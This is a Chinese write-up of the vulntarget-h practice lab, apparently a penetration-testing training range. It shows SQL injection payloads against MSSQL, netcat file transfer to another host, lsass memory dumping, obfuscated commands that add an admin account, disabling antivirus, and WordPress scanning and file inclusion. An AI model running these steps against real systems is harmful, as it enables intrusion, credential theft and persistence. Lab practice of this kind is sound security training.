vulntarget-h 打靶记录

简介: vulntarget-h 打靶记录

0x01 环境


vulntarget-h拓扑

windows10:mimataichangjibuzhu
 windows7:mimataichangyebuhao
win2008: Winmimayijingwangjile@
sa:Adminweishenmezhegehaiyaomima@
wordpresss:root:zhehaiyaomima?

相关漏洞技术

sql注入、文件包含、命令执行,免杀等漏洞利用、隧道代理等

本地环境配置

win2008 >
    ip : 192.168.153.130   
    192.168.1.102
win7 > ip :192.168.153.128
win10 > ip : 192.168.153.129


0x02 打靶记录


Win2008

打开这个站点看一下

note: use querystring value user_id to search for details of a particular users
备注:使用querystring值user_id查询特定用户的详细信息

既然都给提示了,那么就直接SQL注入吧

iis + aspx + Access / SQLServer 数据库

http://192.168.1.102/?user_id=1 and exists(select * from sysobjects)

http://192.168.1.102/?user_id=1 and (select IS_SRVROLEMEMBER('sysadmin')%3E0--

user_id=1;declare @f int,@g int; exec sp_oacreate 'Scripting.FileSystemObject',@f output; EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'C:\inetpub\wwwroot\11.txt'; EXEC sp_oamethod @f,'WriteLine',null,'aaaaac';

exec sp_configure 'show advanced options', 1;RECONFIGURE; exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; declare @o int; exec sp_oacreate 'scripting.filesystemobject', @o out; exec sp_oamethod @o, 'copyfile',null,'C:\Windows\System32\inetsrv\config\applicationHost.config' ,'C:\inetpub\custerr\zh-CN\404.htm';

访问一个不存在的目录,可以获得一个网站路径:

user_id=1;declare @f int,@g int; exec sp_oacreate 'Scripting.FileSystemObject',@f output; EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'C:\inetpub\edrfgyhujikopl\11.txt'; EXEC sp_oamethod @f,'WriteLine',null,'aaaaac';

成功写入

* Username : win2008
 * Domain   : WIN-7DSM1JVE9PO
 * Password : Winmimayijingwangjile@
* Username : Administrator
 * Domain   : WIN-7DSM1JVE9PO
 * Password : Adminmimayijingwangjile@

3389之后先直接果断地干掉360,先关闭主动防御:

windows7

双网卡

接收:nc -lvvp 1234 < 1.txt

发送:nc 127.0.0.1 1234 < 1.txt shell=c:/phpstudy_pro/nc64.exe 192.168.153.130 1234 < c:/phpstudy_pro/COM/a.txt

shell=system('c:/phpstudy_pro/gt.exe "c:/phpstudy_pro/pp.exe -accepteula -ma lsass.exe lsass.dmp"');

shell=system('c:/phpstudy_pro/gt.exe "net use"r" nami nanami_@_123.. /add"'); shell=system('c:/phpstudy_pro/gt.exe "net localgro"u"p administrators nami /add"'); shell=system('c:/phpstudy_pro/gt.exe "net localgroup administrators"');

windows10

这个win10设置开机自启web服务,记得点开一下,上面没有扫描这个地址,就是忘记开启phpstudy了。这里的IP地址不能改变必须是129,它web网站都是适应的设置好的IP

proxychains wpscan --url http://192.168.153.129/ --enumerate vp # 只枚举有漏洞的插件

proxychains wpscan --url http://192.168.153.129/ --enumerate vt # 只枚举存在漏洞的主题

使用插件扫描到XML-RPC漏洞,来验证一下:

POST /xmlrpc.php HTTP/1.1
Host: 192.168.153.129
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

https://www.exploit-db.com/exploits/40290

Title: Mail Masta WP Local File Inclusion

首先测试了一下是否存在远程文件包含,因为我已经拿下了win7这台机器,而且win10那台机器没法写文件。但是没有利用成功,应该是没有开启远程文件包含:

<?php phpinfo();


0x03 总结


拿下win10这个靶场也就打完了,可是打的过程中感觉怪怪的。就是杀毒环境,这个靶场的杀毒环境检测不是很严格,普通的免杀或者命令绕过就可以直接使用,甚至df都不检测执行的命令了,但是在抓密码的时候还是杀掉了我读取的lsass.dmp文件。在win10机器使用了一个smb绕过远程文件包含的技术,这个之前没有接触过,学到了。

相关文章
|
Web App开发 XML 安全
ZeroShell防火墙存在远程命令执行漏洞(CVE-2019-12725)
zeroshell防火墙存在远程命令执行漏洞,攻击者可通过特定URL链接对目标进行攻击!!!
2297 1
|
存储 数据可视化 C语言
[iOS研习记]聊聊iOS中的Mach-O
Mach-O的全称为Mach Object,是OS X与iOS上的一种可执行文件格式。Mach本身指一种操作系统的微内核标准,被用于OS X与iOS系统的内核中。相信对于移动端的iOS开发者来说,对Mach-O文件一定不陌生,我们编译打包的iOS IPA文件,内部其实就有一个可执行的Mach-O文件,我们开发的framework和.a等动态库静态库中,也会包含Mach-O文件,本篇文章,我们就来详细看看Mach-O中究竟放的是什么,Mach-O的结构是怎样的。
1111 0
|
SQL 安全 Java
JavaSecLab 一款综合Java漏洞平台
JavaSecLab是一款综合型Java漏洞学习平台,涵盖多种漏洞场景,提供漏洞代码、修复示例、安全编码规范及友好UI。适用于安全服务、甲方安全培训、安全研究等领域,助于理解漏洞原理与修复方法。支持跨站脚本、SQL注入等多种漏洞类型……
360 2
|
人工智能 运维 DataWorks
语雀+通义千问+DataWorks,让AI定期推送每周总结
DataWorks 数据开发提供强大的工作流及调度能力,且近期上线了数据推送节点,这篇文章简单利用 Shell + AI + 数据推送节点来完成每周工作内容总结。
1393 7
语雀+通义千问+DataWorks,让AI定期推送每周总结
|
存储 Docker 容器
在Docker中,容器退出后,通过docker ps命令查看不到,数据会丢失么?
在Docker中,容器退出后,通过docker ps命令查看不到,数据会丢失么?
|
SQL 安全 Shell
入侵检测之sqlmap恶意流量分析
入侵检测之sqlmap恶意流量分析
333 0
|
机器学习/深度学习 存储 算法
【博士每天一篇文献-综述】Continual lifelong learning with neural networks_ A review
这篇综述论文深入探讨了神经网络在终身学习领域的研究进展,包括生物学启发的概念、终身学习方法的分类与评估,以及未来研究方向,旨在解决神经网络在学习新任务时如何避免灾难性遗忘的问题。
293 2
|
Windows
【Windows】 Win10下报错:该文件没有与之关联的应用来执行该操作。请安装应用,若已经安装应用,请在“默认应用设置”页面中创建关联
【Windows】 Win10下报错:该文件没有与之关联的应用来执行该操作。请安装应用,若已经安装应用,请在“默认应用设置”页面中创建关联
1866 1